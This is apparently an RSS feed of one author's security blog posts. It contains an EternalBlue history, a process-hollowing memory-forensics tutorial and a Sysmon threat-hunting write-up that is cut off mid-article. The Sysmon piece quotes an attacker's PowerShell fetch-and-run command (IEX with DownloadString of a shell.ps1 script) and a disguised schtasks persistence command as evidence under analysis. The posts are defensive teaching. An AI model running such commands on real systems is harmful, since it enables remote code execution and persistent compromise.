<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: M&amp;M</title>
    <description>The latest articles on DEV Community by M&amp;M (@reign4eer).</description>
    <link>https://dev.to/reign4eer</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3884640%2F9ba4a7ed-fd33-4add-ad56-bf2b2cbbaf10.jpg</url>
      <title>DEV Community: M&amp;M</title>
      <link>https://dev.to/reign4eer</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/reign4eer"/>
    <language>en</language>
    <item>
      <title>The NSA built a cyber weapon in secret. It got stolen, leaked, and used to take down Maersk, FedEx, and Merck within weeks.This is the real story of EternalBlue, the exploit behind WannaCry and NotPetya. It's a wild cybersec read. 👇</title>
      <dc:creator>M&amp;M</dc:creator>
      <pubDate>Fri, 03 Jul 2026 10:49:12 +0000</pubDate>
      <link>https://dev.to/reign4eer/the-nsa-built-a-cyber-weapon-in-secret-it-got-stolen-leaked-and-used-to-take-down-maersk-fedex-28jk</link>
      <guid>https://dev.to/reign4eer/the-nsa-built-a-cyber-weapon-in-secret-it-got-stolen-leaked-and-used-to-take-down-maersk-fedex-28jk</guid>
      <description>&lt;div class="ltag__link--embedded"&gt;
  &lt;div class="crayons-story "&gt;
  &lt;a href="https://dev.to/reign4eer/the-nsa-secret-that-brought-the-world-to-its-knees-1c83" class="crayons-story__hidden-navigation-link"&gt;The NSA Secret That Brought The World To Its Knees&lt;/a&gt;


  &lt;div class="crayons-story__body crayons-story__body-full_post"&gt;
    &lt;div class="crayons-story__top"&gt;
      &lt;div class="crayons-story__meta"&gt;
        &lt;div class="crayons-story__author-pic"&gt;

          &lt;a href="/reign4eer" class="crayons-avatar  crayons-avatar--l  "&gt;
            &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3884640%2F9ba4a7ed-fd33-4add-ad56-bf2b2cbbaf10.jpg" alt="reign4eer profile" class="crayons-avatar__image" width="780" height="776"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
          &lt;div&gt;
            &lt;a href="/reign4eer" class="crayons-story__secondary fw-medium m:hidden"&gt;
              M&amp;amp;M
            &lt;/a&gt;
            &lt;div class="profile-preview-card relative mb-4 s:mb-0 fw-medium hidden m:inline-block"&gt;
              
                M&amp;amp;M
                
              
              &lt;div id="story-author-preview-content-3978787" class="profile-preview-card__content crayons-dropdown branded-7 p-4 pt-0"&gt;
                &lt;div class="gap-4 grid"&gt;
                  &lt;div class="-mt-4"&gt;
                    &lt;a href="/reign4eer" class="flex"&gt;
                      &lt;span class="crayons-avatar crayons-avatar--xl mr-2 shrink-0"&gt;
                        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3884640%2F9ba4a7ed-fd33-4add-ad56-bf2b2cbbaf10.jpg" class="crayons-avatar__image" alt="" width="780" height="776"&gt;
                      &lt;/span&gt;
                      &lt;span class="crayons-link crayons-subtitle-2 mt-5"&gt;M&amp;amp;M&lt;/span&gt;
                    &lt;/a&gt;
                  &lt;/div&gt;
                  &lt;div class="print-hidden"&gt;
                    
                      Follow
                    
                  &lt;/div&gt;
                  &lt;div class="author-preview-metadata-container"&gt;&lt;/div&gt;
                &lt;/div&gt;
              &lt;/div&gt;
            &lt;/div&gt;

          &lt;/div&gt;
          &lt;a href="https://dev.to/reign4eer/the-nsa-secret-that-brought-the-world-to-its-knees-1c83" class="crayons-story__tertiary fs-xs"&gt;&lt;time&gt;Jul 3&lt;/time&gt;&lt;span class="time-ago-indicator-initial-placeholder"&gt;&lt;/span&gt;&lt;/a&gt;
        &lt;/div&gt;
      &lt;/div&gt;

    &lt;/div&gt;

    &lt;div class="crayons-story__indention"&gt;
      &lt;h2 class="crayons-story__title crayons-story__title-full_post"&gt;
        &lt;a href="https://dev.to/reign4eer/the-nsa-secret-that-brought-the-world-to-its-knees-1c83" id="article-link-3978787"&gt;
          The NSA Secret That Brought The World To Its Knees
        &lt;/a&gt;
      &lt;/h2&gt;
        &lt;div class="crayons-story__tags"&gt;
        &lt;/div&gt;
      &lt;div class="crayons-story__bottom"&gt;
        &lt;div class="crayons-story__details"&gt;
            &lt;a href="https://dev.to/reign4eer/the-nsa-secret-that-brought-the-world-to-its-knees-1c83#comments" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left flex items-center"&gt;
              

              &lt;span class="hidden s:inline"&gt;Add&amp;nbsp;Comment&lt;/span&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div class="crayons-story__save"&gt;
          &lt;small class="crayons-story__tertiary fs-xs mr-2"&gt;
            6 min read
          &lt;/small&gt;
            
              &lt;span class="bm-initial crayons-icon c-btn__icon"&gt;
                

              &lt;/span&gt;
              &lt;span class="bm-success crayons-icon c-btn__icon"&gt;
                

              &lt;/span&gt;
            
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;


</description>
    </item>
    <item>
      <title>The NSA Secret That Brought The World To Its Knees</title>
      <dc:creator>M&amp;M</dc:creator>
      <pubDate>Fri, 03 Jul 2026 09:17:33 +0000</pubDate>
      <link>https://dev.to/reign4eer/the-nsa-secret-that-brought-the-world-to-its-knees-1c83</link>
      <guid>https://dev.to/reign4eer/the-nsa-secret-that-brought-the-world-to-its-knees-1c83</guid>
      <description>&lt;p&gt;One of the most dramatic stories in the cyberspace I ever heard was the unfolding story of EternalBlue, a well known cyber weapon developed by the NSA that surfaced the internet back in 2016.  &lt;/p&gt;

&lt;p&gt;In this blog, I'm going to narrate the story of how it all went down: The backstory, what EternalBlue is, and what damage it did. All this information is freely accessible on the internet.&lt;/p&gt;

&lt;p&gt;Talk about 'sit down and have some tea!'&lt;/p&gt;

&lt;h2&gt;
  
  
  The NSA's Secret ToolBox
&lt;/h2&gt;

&lt;p&gt;So, I know you've heard of the NSA - National Security Agency; an intelligence agency in the US. NSA is responsible for monitoring and processing data for intelligence purposes, and protecting US communication networks and information systems. &lt;/p&gt;

&lt;p&gt;In 2013, the world got a massive leakage on the internet of the NSA ANT Catalogue. This leak gave us an inside scoop of what the NSA group really does (I'm not really sure who leaked this). So, what was the NSA ANT Catalogue? ANT stands for Advance Network Technology, and the NSA ANT Catalogue was a compiled list of hacks, exploits, and cyber tools that the NSA used. The items on the catalogue were used by the people working within NSA on specific missions. If you needed an exploit described on the catalogue, make a request and get the software. &lt;/p&gt;

&lt;p&gt;Now, this list is mind-blowing, I mean... the tools on here shouldn't even exist in my opinion, because if they were ever used on me, I'd feel completely exposed and violated! &lt;/p&gt;

&lt;p&gt;Some of the tools include:&lt;br&gt;
GOPHERSET — A hidden program on a phone's SIM card that secretly copies contacts, text messages, and call logs and sends them to the spies.&lt;br&gt;
DROPOUTJEEP — Spy software for iPhones that lets an agency remotely read texts, listen to voicemail, track location, and turn on the camera or microphone.&lt;br&gt;
COTTONMOUTH — A USB plug or cable that looks completely normal but secretly contains a hidden radio, letting spies get into a computer or network without needing internet access.&lt;br&gt;
MONKEYCALENDAR — A hidden program on a phone's SIM card that secretly texts the phone's location to the spies.&lt;/p&gt;

&lt;p&gt;...The list goes on and on. There are about 50 exploits in the catalogue. The primary objective of having these tools on hand for the NSA was to gather intelligence on computer systems.&lt;/p&gt;

&lt;p&gt;This leakage came really close to exposing some potentially harmful tools to the world. These exploits in the wrong hands would be a nightmare. The catalogue that was leaked did not actually have the tools themselves, just the description of the tools available for use. &lt;/p&gt;

&lt;p&gt;What a relief, right? But wait, don't relax just yet... the worst did happen just 3 years later!&lt;/p&gt;

&lt;h2&gt;
  
  
  Enter the Shadow Brokers
&lt;/h2&gt;

&lt;p&gt;Fast forward, in 2016, Twitter witnessed the dramatic entry of a hacker group called the Shadow Brokers. The tweet sent said that the Shadow Brokers have hacked 'Equation Group', and found many cyber-weapons. The tweet goes on to say, 'You see picture?  We give you some Equation Group files free... We are auction the best files.' Shadow Brokers basically announced to the world that they have stolen some cyber weapons from 'Equation Group'. Not only were they offering a sample tool for free, but they were also planning to auction the rest of the tools to anyone willing and able to buy them.&lt;/p&gt;

&lt;p&gt;Now, who is Equation Group? Any guesses...?&lt;/p&gt;

&lt;p&gt;Sometimes when researchers investigate a hacking campaign and can't say for certain who's behind it, they give the attackers a unique codename based on distinctive traits of their tools. A year prior to this tweet, cybersecurity firm Kaspersky Lab discovered a highly sophisticated hacking group and called it  'Equation Group'. The name came from the group's heavy use of complex encryption algorithms in their malware. Kaspersky stopped short of officially naming the NSA, but researchers and journalists widely concluded the Equation Group was linked to the NSA, based on overlapping tools and techniques (including some of the exact ANT catalog implants)&lt;/p&gt;

&lt;h2&gt;
  
  
  The Dump That Changed Everything
&lt;/h2&gt;

&lt;p&gt;The news was spreading all over the internet fast, that the NSA had been hacked, and their hacking tools were readily available. Security researchers everywhere were scrambling to find out how the Shadowbrokers got these tools in the first place. Did they really get into the NSA's network? Or did the NSA accidentally leave the exploits behind in one of their missions?&lt;/p&gt;

&lt;p&gt;Shadowbrokers did put up other tools for auction, but unfortunately for them, they did not raise the amount of money in Bitcoin that they were hoping for. So, they began releasing the rest of the tools. One dreaded post at the time, the group made out several dumps of the exploits to the entire world!&lt;/p&gt;

&lt;p&gt;I can just imagine someone working within the NSA not sleeping at all during this time.&lt;/p&gt;

&lt;p&gt;The tools not only looked very legit, but were exploits that had not been previously seen before, classifying most of them as zero-day exploits. &lt;/p&gt;

&lt;p&gt;A zero-day exploit is when hackers find and use a secret flaw in software before the company that made it even knows the flaw exists... so there's no fix available yet. It's called "zero-day" because the software maker has had zero days to patch the problem, leaving users exposed until they discover it and release a fix.&lt;/p&gt;

&lt;p&gt;One of the most intriguing exploits within the dumps was one called EternalBlue. EternalBlue exploited a flaw hidden deep inside SMB (Server Message Block), basically the system in Windows that lets computers on the same network talk to each other and share things like files and printers. If a hacker used it correctly, they could remotely run their own code on a vulnerable Windows machine, without ever needing a password or tricking anyone into clicking a link. And this wasn't limited to one office or one country. Any unpatched Windows machine on earth was a potential target.&lt;/p&gt;

&lt;h2&gt;
  
  
  Microsoft's Race Against The Clock
&lt;/h2&gt;

&lt;p&gt;Now, by the time the dump containing EternalBlue hit the ground, the NSA, knowing that they tool might leak, had already warned Microsoft about the vulnerability. NSA understood how damaging the weapon is.&lt;/p&gt;

&lt;p&gt;I would be pissed if I were Microsoft. I mean, a security agency meant to protect, found an exploitable flaw in its software, and instead of working to fix the flaw as soon as possible, they created a tool to exploit the flaw?!&lt;/p&gt;

&lt;p&gt;Once Microsoft learnt about the risk at hand, they rushed out a patch to fix the flaw in Windows, but here's the problem. Windows is used on over 1.4 billion devices all over the world, banks, hospitals, small businesses, government offices, regular home users. Getting all of them to actually download and install the patch takes real time. And when EternalBlue got in the hands of hackers, they didn't waste any time at all. &lt;/p&gt;

&lt;h2&gt;
  
  
  Then, The World Got Hit
&lt;/h2&gt;

&lt;p&gt;EternalBlue caused so much damage even after the fix already existed. Just a month after its release, the cyberattack WannaCry hit, using EternalBlue to spread itself across networks. Within a day it had infected over 230,000 computers across more than 150 countries, including the U.S., England, India, Taiwan, Russia, and Ukraine. Some sources put the number closer to 200,000+, but either way, it remains one of the fastest-spreading cyberattacks in history.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.akamai.com/glossary/what-is-wannacry-ransomware" rel="noopener noreferrer"&gt;Source: https://www.akamai.com/glossary/what-is-wannacry-ransomware&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A month and a half later, the NotPetya cyberattack happened. It also used EternalBlue in the same way. NotPetya was disguised as ransomware while actually being a wiper, meaning even victims who paid could never get their files back. Maersk lost between $250 and $300 million. FedEx's subsidiary TNT Express lost over $300 million. Merck lost around $870 million, with 10,000 of its Windows machines going down in the first 90 seconds alone, a number that quadrupled to over 40,000 machines by the time the attack ran its course.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.controleng.com/throwback-attack-how-notpetya-accidentally-took-down-global-shipping-giant-maersk/" rel="noopener noreferrer"&gt;Source: https://www.controleng.com/throwback-attack-how-notpetya-accidentally-took-down-global-shipping-giant-maersk/&lt;/a&gt;&lt;br&gt;
&lt;a href="https://cyberscoop.com/fedex-attributes-300-million-loss-notpetya-attack/" rel="noopener noreferrer"&gt;Source: https://cyberscoop.com/fedex-attributes-300-million-loss-notpetya-attack/&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.bankinfosecurity.com/merck-ruling-a-21983" rel="noopener noreferrer"&gt;Source: https://www.bankinfosecurity.com/merck-ruling-a-21983&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  So, there it is.
&lt;/h2&gt;

&lt;p&gt;The NSA built a weapon meant to stay buried forever, and instead, it ended up in the hands of hackers, criminals, and chaos itself. WannaCry struck first, tearing through 230,000 computers in a single day like wildfire. Then NotPetya crashed the party, leaving Maersk, FedEx, and Merck to pick up the pieces of a nearly $1.5 billion mess. EternalBlue, built in the shadows, found its way to the public, and by then, it was already too late.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Process Hollowing Detection: Your RAM is your treasure!</title>
      <dc:creator>M&amp;M</dc:creator>
      <pubDate>Fri, 08 May 2026 08:40:24 +0000</pubDate>
      <link>https://dev.to/reign4eer/process-hollowing-detection-your-ram-is-your-treasure-4fj1</link>
      <guid>https://dev.to/reign4eer/process-hollowing-detection-your-ram-is-your-treasure-4fj1</guid>
      <description>&lt;p&gt;&lt;strong&gt;INTRODUCTION&lt;/strong&gt;&lt;br&gt;
Today, we are going to be diving into Process Hollowing, a cyber attack technique used by hackers to introduce and run malware into a victim machine.&lt;/p&gt;

&lt;p&gt;In this article, you'll learn how it works, how to detect it on your system, and go through a practical carried out to detect Process Hollowing.&lt;/p&gt;

&lt;p&gt;Before beginning the article, a huge thank you to &lt;a href="https://www.linkedin.com/company/hsc-consult/posts/?feedView=all" rel="noopener noreferrer"&gt;HSC Consult&lt;/a&gt; for the mentorship efforts on this journey.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HOW DOES PROCESS HOLLOWING WORK?&lt;/strong&gt;&lt;br&gt;
On a very high level, this is just a bad untrusted process pretending to be a trusted process, in order to avoid detection systems. As a user, you could be seeing a notepad process running. Normal, right? Wrong! Someone made it look like a notepad process, but it really is malware running on your system.&lt;/p&gt;

&lt;p&gt;Process Hollowing starts up a new program that is known and trusted, and right before the program executes, the attacker finds where the program code sits in memory, writes over the code with new code, and then executes the process. That way, when the trusted program fully executes, it executes the injected malware. &lt;/p&gt;

&lt;p&gt;Just as an example, let's say that the trusted process is notepad.exe, a tool used very frequently on Windows system.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpf30936xelypge2jf8q4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpf30936xelypge2jf8q4.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HOW RAM CAN BE USEFUL IN DETECTING PROCESS HOLLOWING&lt;/strong&gt;&lt;br&gt;
When this happens, memory analysis is very helpful in detecting this technique. Note that Process Hollowing can be classified as 'Living-off-the-land' (LOTL) attack, since it makes use of legitimate processes (Read more on LOTL &lt;a href="https://www.vectra.ai/topics/living-off-the-land" rel="noopener noreferrer"&gt;here&lt;/a&gt;). &lt;/p&gt;

&lt;p&gt;To understand how RAM is useful here, let's review how RAM works.&lt;/p&gt;

&lt;p&gt;RAM is the short-term working memory of the computer. What does that even mean? Well, think about this analogy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Say you wanted to have breakfast in the morning. You think &lt;em&gt;"Let me warm some bacon and toast on the pan"&lt;/em&gt;, and then &lt;em&gt;"The heat is too much... there, much better!"&lt;/em&gt;, &lt;em&gt;"All done. It's smells so good"&lt;/em&gt;, &lt;em&gt;"Wow, that was delicious, I was so hungry!"&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;Once you're done with breakfast, you leave the pan and plate in the sink to clean later.&lt;/li&gt;
&lt;li&gt;If I walked into your kitchen and find the pan and plate in the sink, that will be enough evidence to tell me that you ate breakfast today.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Well, sometimes when attacks happen, there exists the typical evidence that tells us that someone did something, just like the dishes in the sink. This often appears as malicious files within the computer storage.  &lt;/p&gt;

&lt;p&gt;But what if they don't leave a file behind? What if they clean up the sink after breakfast? In that case, we can search the memory for 'thoughts', such as the thoughts you had while having bacon and toast for breakfast. Those thoughts tell us what you did sequentially, what you ate, when you ate it and that you actually enjoyed breakfast. RAM works the same way; it logs the processes within the computer as they are happening, regardless of whether there is evidence on the disk or not.&lt;/p&gt;

&lt;p&gt;One thing to remember about RAM is that it is volatile (can be lost very easily). RAM requires continuous power to maintain data. During a forensic investigation, never switch off the computer! Capture RAM first, before the computer is powered off. If the power goes off, you lose your treasure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PRACTICAL&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://volatilityfoundation.org/" rel="noopener noreferrer"&gt;Volatility&lt;/a&gt; is a supreme tool for memory analysis! Once you have the captured RAM, you can generate a couple of reports using the tool, which you'll analyse for the threat landscape.&lt;/p&gt;

&lt;p&gt;For this practical, 3 reports were analysed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;pstree_output.txt&lt;/code&gt; (Process Tree Analysis)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;malfind_results.txt&lt;/code&gt; (Memory Injection/In-memory artifacts)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;netscan_results.txt&lt;/code&gt; (Network Connection artifacts)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Analysis of Parent-Child Process Hierarchy&lt;/strong&gt;&lt;br&gt;
The &lt;code&gt;pstree_output.txt&lt;/code&gt; report maps out all running processes and their parent-child relationships, helping you spot processes spawned by unusual or unexpected parents.&lt;/p&gt;

&lt;p&gt;The goal here is to confirm that each active process came from a valid parent in order to create a baseline of system integrity. Every entry was compared to the Parent Process ID (PPID) standard Windows architectural expectations.&lt;/p&gt;

&lt;p&gt;Process    .....  PID .... Parent Process  .... PPID .... Is this normal?&lt;br&gt;
svchost.exe ....  720 .... services.exe .... 512 .... Yes&lt;br&gt;
svchost.exe ....  884 .... services.exe .... 512 .... Yes&lt;br&gt;
svchost.exe .... 3880 .... notepad.exe .... 2250 .... No!&lt;/p&gt;

&lt;p&gt;svchost.exe is a standard Windows system process, completely legit. It seems that the third svchost.exe was spawned by the parent process notepad.exe, which is very unusual and suspicious.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Analysis of the Network Connections&lt;/strong&gt;&lt;br&gt;
The detected PID 3880 was cross-analyzed using grep CLI command across the remaining forensic datasets. The results showed one entry each within the other reports.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;netscan_results.txt&lt;/code&gt; report lists all active and recently closed network connections, showing which processes are communicating externally and on what ports.&lt;/p&gt;

&lt;p&gt;PID 3880 in the networkscan file indicates that the process is communicating outside of the local network and is linked to an active, established connection to an external host. Looking at the report, there was an external IP connection, with Port of destination: 443 (HTTPS) and State of Connection: Established.&lt;/p&gt;

&lt;p&gt;Using Port 443 enables the malicious communication to evade perimeter firewall inspections and interact with legitimate online traffic. This established relationship demonstrates that the process is actively controlled by an outside party rather than just being inactive, Command &amp;amp; Control (C2) in action!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Malware Analysis and Memory Artefacts&lt;/strong&gt;&lt;br&gt;
The &lt;code&gt;malfind_results.txt&lt;/code&gt; report scans memory regions for suspicious executable code, flagging areas with RWX permissions or embedded PE headers that suggest injection.&lt;/p&gt;

&lt;p&gt;svchost.exe (PID 3880) showed an indicator of a malicious payload; it showed indicators of injected shellcode or a reflective PE (Portable Executable) loader in the existence of RWX memory. This means that the file had read, write and execute permissions, which is very unusual. PAGE_EXECUTE_READ or PAGE_READONLY is the architectural standard for a common system component such as svchost.exe.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc9q326ji5nafxkmhnw9a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc9q326ji5nafxkmhnw9a.png" alt=" " width="512" height="307"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Magic Bytes were found at the beginning of the memory section after more examination of the PID 3880 raw hexadecimal data:&lt;br&gt;
Header in Hex: 4d 5a&lt;br&gt;
Translation of ASCII: MZ&lt;/p&gt;

&lt;p&gt;These bytes are the Windows Portable Executable (.exe) Magic Header, a raw executable header residing unbacked in the memory space of the running process, indicating that a malicious binary has been loaded straight into the RAM of PID 3880.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CONCLUSION&lt;/strong&gt;&lt;br&gt;
Process Hollowing is a sneaky technique, but it's not unbeatable. As we saw in the practical, memory analysis using Volatility can expose the attack through a combination of clues — an unusual parent-child process relationship, an active C2 connection, and RWX memory regions containing a raw PE header. You can use Volatility to get more clues! No single indicator tells the full story, but together they paint a clear picture of compromise. The takeaway? Always capture RAM before pulling the plug, and let the memory do the talking. The attacker may have skipped leaving files on disk, but the "thoughts" in RAM gave them away.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Sysmon Logs Deep-Dive - From Raw Data to Threat Evidence</title>
      <dc:creator>M&amp;M</dc:creator>
      <pubDate>Mon, 20 Apr 2026 15:14:19 +0000</pubDate>
      <link>https://dev.to/reign4eer/sysmon-logs-deep-dive-from-raw-data-to-threat-evidence-5136</link>
      <guid>https://dev.to/reign4eer/sysmon-logs-deep-dive-from-raw-data-to-threat-evidence-5136</guid>
      <description>&lt;p&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine getting an alert that your systems have been compromised, and yet you've gotten zero alerts from your EDR. None! As much as we trust our automated software tools, it's not enough to sit tight and comfy until you get an alert. You should know that hackers expect you to sit back and wait for them, and they use that to their advantage. You don't believe me? Look at this tool right here - &lt;a href="https://github.com/Yaxser/Backstab" rel="noopener noreferrer"&gt;Backstab&lt;/a&gt;. Go ahead. I'll wait. &lt;/p&gt;

&lt;p&gt;The damn thing is meant to kill Anti-malware protected processes! Your EDR can be silenced easily, and this is just one of many tools out there.&lt;/p&gt;

&lt;p&gt;That's why we have Threat Hunters. It is essential to have an intelligent and inquisitive team working 24/7 assuming that a breach has already happened, and searching through your system for anything that your EDR and Anti-malware might have missed.&lt;/p&gt;

&lt;p&gt;This article shows the logic behind sniffing out an attacker in your system. We will be analysing logs from &lt;a href="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon" rel="noopener noreferrer"&gt;Sysmon&lt;/a&gt;, a tool used to monitor and log system activity to Windows event log.&lt;/p&gt;

&lt;p&gt;Before beginning the article, a huge thank you to &lt;a href="https://www.linkedin.com/company/hsc-consult/posts/?feedView=all" rel="noopener noreferrer"&gt;HSC Consult&lt;/a&gt; for the mentorship efforts on this journey.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Challenge for the day&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Effective threat hunting starts with quality intelligence about previous attacks. A good way to stay proactive is by using third-party threat feeds that allow you to add threat intelligence from external sources to your firewall. Such a set-up checks your logs to see if traffic matches any Indicators of Compromise, i.e., IP addresses, domains, URLs that are commonly used by known threat actors.&lt;/p&gt;

&lt;p&gt;In our case, a third-party feed noticed a very suspicious IP address in the Windows event logs, that was linked to a famous hacker group. The EDR in place didn't flag anything. That's bad news.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finding the culprit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A JSON log dataset was extracted from Sysmon to identify the point of entry, the persistence mechanism and the attacker's ultimate goal. Before getting to the good stuff, I had to clean the dataset: there's always some 'noise' to be edited out. &lt;/p&gt;

&lt;p&gt;First thing's first, I searched for the suspicious IP that was flagged in our system. The results showed that there was one EventID 3. EventID is basically a category of logs. There are several categories to know. A Sysmon EventID 3 often means that a network connection was made. The Image associated with the log was a file path to Powershell. The port used was Port 80. There was also a CommandLine value found.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What exactly did they do?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The attacker made a network connection to Powershell... that's odd... Rather than using suspicious remote desktop tools, they used Powershell, a normal everyday tool used for legit purposes. No wonder the EDR missed this! This kind of attack is called "Living off the Land" (LotL) attack, because they are abusing known and trusted tools to do their dirty work. &lt;/p&gt;

&lt;p&gt;Was there any Process Creation events, I mean, how did this attack begin? Maybe we could find more information on the parent processes or any command line arguments used. I searched for any Sysmon EventID 1 (Process Creation Events) associated with the suspicious IP. No hit. Any Process IDs? ... nope. Okay... I think the attacker was already in the system before Sysmon began capturing these logs.&lt;/p&gt;

&lt;p&gt;Let's take a look at the CommandLine value found. The command was Base64-encoded. They used ‘-enc ‘ (-EncodedCommand), basically saying 'Hey Powershell, execute this Base64 encoded script as a command, thanks!' Sneaky bastards. This is obfuscation, an attempt to hide their intent and avoid being caught by security monitoring tools. Another reason why the EDR missed this.&lt;/p&gt;

&lt;p&gt;What does this command do? I decoded the command, and guess what I found... &lt;br&gt;
&lt;code&gt;IEX&lt;/code&gt; - A built-in Powershell command (Invoke-Expression) that runs a specific string as a command.&lt;br&gt;
&lt;code&gt;(New-Object Net.WebClient).&lt;/code&gt; - In Windows, this part of the command references a class used to download things from the internet&lt;br&gt;
&lt;code&gt;DownloadString('http:///...url.../shell.ps1)&lt;/code&gt; - This is an instruction to fetch code from the URL, and ‘shell.ps1’ is the powershell script being downloaded.&lt;/p&gt;

&lt;p&gt;Essentially, they are trying to fetch and execute a payload directly into the memory of the system using Powershell. This is a common fileless payload delivery mechanism, where the attacker avoids touching the disk, and leaving forensic evidence that can be caught by Antiviruses and EDR solutions. Third reason why the EDR missed this.&lt;/p&gt;

&lt;p&gt;Also, the attacker made a mistake when scripting the attack. They used a triple slash ‘///’ instead of a double slash ‘//’ to reference the URL. The command was typed out by a human being, rather than an automated server. Man is to error. Got you!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnfc0t5vd6dh058pu8lr4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnfc0t5vd6dh058pu8lr4.png" alt="Big-brain Meme" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Did they make an effort to stay here?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When I see Powershell being used for such a thing, the default line of questioning is, did they do anything to ensure their scripts are not just running the first time, but even after the system reboots? This is called Persistence; they just don't want to leave.&lt;/p&gt;

&lt;p&gt;Attackers can manipulate Registry Run Keys to ensure that malicious programs run automatically when the system starts, obtaining persistence. I searched through the dataset for execution of ‘reg.exe’, making sure to run a case sensitive search. No ‘reg.exe’ was found.&lt;/p&gt;

&lt;p&gt;Scheduled Tasks can also be used to gain persistence and maintain access to compromised systems by automating certain tasks to run at specific times and under certain conditions. I searched through the dataset for any Process Creation events with Image containing ‘schtasks.exe’. I found something: One entry was found with EventID 1 and an Image referencing ‘schtasks.exe’. &lt;/p&gt;

&lt;p&gt;The command line used by the attacker to remain in the system after reboot was:&lt;br&gt;
&lt;code&gt;/Create&lt;/code&gt; - Making a new scheduled tasks&lt;br&gt;
&lt;code&gt;/SC MINUTE&lt;/code&gt; - Scheduling the task by the minute&lt;br&gt;
&lt;code&gt;/MO 30&lt;/code&gt; - Instruction to run the task every 30 minutes&lt;br&gt;
&lt;code&gt;/TN \"WindowsUpdateCheck\&lt;/code&gt; - Naming the task ‘WindowsUpdateCheck’&lt;br&gt;
&lt;code&gt;/TR \"C:\\Users\\Public\\Update.exe\&lt;/code&gt; - Instruction to run the task in the named file&lt;/p&gt;

&lt;p&gt;The attacker used a command that created a new scheduled task that was scheduled to run every 30 minutes. This is a significant red flag! Why?&lt;/p&gt;

